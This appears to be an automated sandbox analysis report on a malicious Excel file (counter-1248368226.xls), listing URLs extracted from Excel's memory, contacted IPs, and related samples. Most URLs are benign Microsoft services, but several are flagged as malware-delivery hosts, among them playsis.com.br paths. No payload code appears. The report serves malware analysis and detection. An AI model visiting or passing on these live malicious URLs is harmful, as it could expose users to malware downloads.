                                                                    https://outlook.office365.com/autodiscover/autodiscover.json3EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://cortana.aiIYEXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://lookup.onenote.com/lookup/geolocation/v1JEXCEL.EXE, 00000001.00000003.527855395.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526977901.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339302511.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611671160.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325294672.00000000137D0000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://api.onedrive.comMBIEXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonMBI_SSLpeople.directory.EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://api.diagnostics.office.comhucEXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://login.windows-ppe.net/common/oauth2/authorizeuoEXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://loki.delve.office.com/api/v1/configuration/officewin32/WEXCEL.EXE, 00000001.00000003.527855395.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526977901.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339302511.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611671160.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325294672.00000000137D0000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonEXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                                                                                		high
                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrYOEXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://login.windows.net/common/oauth2/authorize&Z0EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://ncus.contentsync.EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                                                                                      		high
                                                                                      http://weather.service.msn.com/data.aspxEXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                                                                                        		high
                                                                                        https://substrate.office.comREXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://substrate.office.comPEXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://playsis.com.br/qJSL1BNsEXCEL.EXE, 00000001.00000003.462703099.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.612583630.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.418614920.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.324846454.00000000167D3000.00000004.00000001.sdmptrue
                                                                                        • Avira URL Cloud: malware
                                                                                        		unknown
                                                                                        https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosEXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                                                                                          		high
                                                                                          https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlEXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                                                                                            		high
                                                                                            https://login.windows.net/common/oauth2/authorizebEXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://login.windows.net/common/oauth2/authorizecEXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://login.windows.net/common/oauth2/authorizen_EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://wus2.contentsync.EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://analysis.windows.net/powerbi/apiEEXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://onedrive.live.comedEXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://clients.config.office.net/user/v1.0/ios3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                                                                                                      		high
                                                                                                      https://login.windows.net/common/oauth2/authorizefEXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://login.windows.net/common/oauth2/authorizeXEXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://login.windows.net/common/oauth2/authorizeYEXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            https://login.windows.net/common/oauth2/authorizeZEXCEL.EXE, 00000001.00000003.527855395.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526977901.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339302511.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611671160.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325294672.00000000137D0000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://api.office.net=slEXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		low
                                                                                                              https://o365auditrealtimeingestion.manage.office.comEXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                                                                                                                		high
                                                                                                                https://substrate.office.com4:EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://login.windows.net/common/oauth2/authorize%_3EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://outlook.office365.com/api/v1.0/me/ActivitiesEXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                                                                                                                    		high
                                                                                                                    https://clients.config.office.net/user/v1.0/android/policies3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                                                                                                                      		high
                                                                                                                      https://login.windows.net/common/oauth2/authorizeREXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://login.windows.net/common/oauth2/authorizeSEXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://clients.config.office.net/user/v1.0/android/policieshttps://login.windows.net/common/oauth2/EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://login.windows.net/common/oauth2/authorizeTEXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://dataservice.o365filtering.comUVEXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://login.windows.net/common/oauth2/authorizeUEXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://entitlement.diagnostics.office.comEXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                                                                                                                                  		high
                                                                                                                                  https://login.windows.net/common/oauth2/authorizeWEXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://login.windows.net/common/oauth2/authorizeHEXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonEXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                                                                                                                                        		high
                                                                                                                                        https://playsis.com.br/qJSL1BN5V/tiynh.htmlvn/TSh7GBeIR/tiynh.htmlEXCEL.EXE, 00000001.00000003.462703099.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.612583630.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.418614920.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.324846454.00000000167D3000.00000004.00000001.sdmptrue
                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                        		unknown
                                                                                                                                        https://api.office.netlsEXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        https://login.windows.net/common/oauth2/authorizeJEXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                                                                                                                          		high

                                                                                                                                          Contacted IPs

                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs

                                                                                                                                          Public

                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          162.241.2.78
                                                                                                                                          		playsis.com.brUnited States
                                                                                                                                          		26337OIS1USfalse
                                                                                                                                          108.179.192.98
                                                                                                                                          		greenflag.esp.brUnited States
                                                                                                                                          		46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                          103.28.36.171
                                                                                                                                          		noithat117.vnViet Nam
                                                                                                                                          		131353NHANHOA-AS-VNNhanHoaSoftwarecompanyVNfalse

                                                                                                                                          Private

                                                                                                                                          IP
                                                                                                                                          192.168.2.1

                                                                                                                                          General Information

                                                                                                                                          Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                          Analysis ID:532597
                                                                                                                                          Start date:02.12.2021
                                                                                                                                          Start time:14:42:56
                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 6m 27s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:full
                                                                                                                                          Sample file name:counter-1248368226.xls
                                                                                                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                          Run name:Potential for more IOCs and behavior
                                                                                                                                          Number of analysed new started processes analysed:22
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                          Technologies:
                                                                                                                                          • HCA enabled
                                                                                                                                          • EGA enabled
                                                                                                                                          • HDC enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal80.expl.winXLS@7/5@3/4
                                                                                                                                          EGA Information:Failed
                                                                                                                                          HDC Information:Failed
                                                                                                                                          HCA Information:
                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                          • Number of executed functions: 0
                                                                                                                                          • Number of non-executed functions: 1
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Adjust boot time
                                                                                                                                          • Enable AMSI
                                                                                                                                          • Found application associated with file extension: .xls
                                                                                                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                          • Attach to Office via COM
                                                                                                                                          • Scroll down
                                                                                                                                          • Close Viewer
                                                                                                                                          Warnings:
                                                                                                                                          Show All
                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                          • Excluded IPs from analysis (whitelisted): 52.109.88.177, 52.109.12.23, 52.109.76.33, 52.109.8.25
                                                                                                                                          • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, prod-w.nexus.live.com.akadns.net, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, europe.configsvc1.live.com.akadns.net
                                                                                                                                          • Execution Graph export aborted for target EXCEL.EXE, PID 2256 because there are no executed function
                                                                                                                                          • Not all processes where analyzed, report is missing behavior information

                                                                                                                                          Simulations

                                                                                                                                          Behavior and APIs

                                                                                                                                          No simulations

                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                          IPs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                          162.241.2.78#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exeGet hashmaliciousBrowse
                                                                                                                                          • www.entreiparaodigital.com/jdkn/?1b0=I3SbQcfk5mKncCcQGw+gNueSmbNJxTZBbu+zAfDoz/ZWf2NQtBtv1zSdSMyJHdn3WlwE&mJBHHf=B0DPf0S8Ibot
                                                                                                                                          108.179.192.98counter-1248368226.xlsGet hashmaliciousBrowse
                                                                                                                                            counter-1248368226.xlsGet hashmaliciousBrowse
                                                                                                                                              counter-1248368226.xlsGet hashmaliciousBrowse
                                                                                                                                                counter-119221000.xlsGet hashmaliciousBrowse
                                                                                                                                                  counter-119221000.xlsGet hashmaliciousBrowse
                                                                                                                                                    tr.xlsGet hashmaliciousBrowse
                                                                                                                                                      tr.xlsGet hashmaliciousBrowse
                                                                                                                                                        counter-1389180325.xlsGet hashmaliciousBrowse
                                                                                                                                                          counter-1389180325.xlsGet hashmaliciousBrowse
                                                                                                                                                            103.28.36.171211094.exeGet hashmaliciousBrowse
                                                                                                                                                            • www.nhadat9chu.com/iae2/?Cb=tlIjdtxg+6ss6GeFkxkNX/Gta+EnXEkPHxZQNKO5opTQPj/ZdNFPdnHw1EJZhrtLdJv1ORZ2Rg==&uVjH=yVCTVb0XT254cnY

                                                                                                                                                            Domains

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            noithat117.vncounter-1248368226.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            counter-1248368226.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            counter-1248368226.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            counter-119221000.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            counter-119221000.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            tr.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            tr.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            counter-1389180325.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            counter-1389180325.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            playsis.com.brcounter-1248368226.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            counter-1248368226.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            counter-1248368226.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            counter-119221000.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            counter-119221000.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            tr.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            tr.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            counter-1389180325.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            counter-1389180325.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            greenflag.esp.brcounter-1248368226.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            counter-1248368226.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            counter-119221000.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            counter-119221000.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            tr.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            tr.xlsGet hashmaliciousBrowse
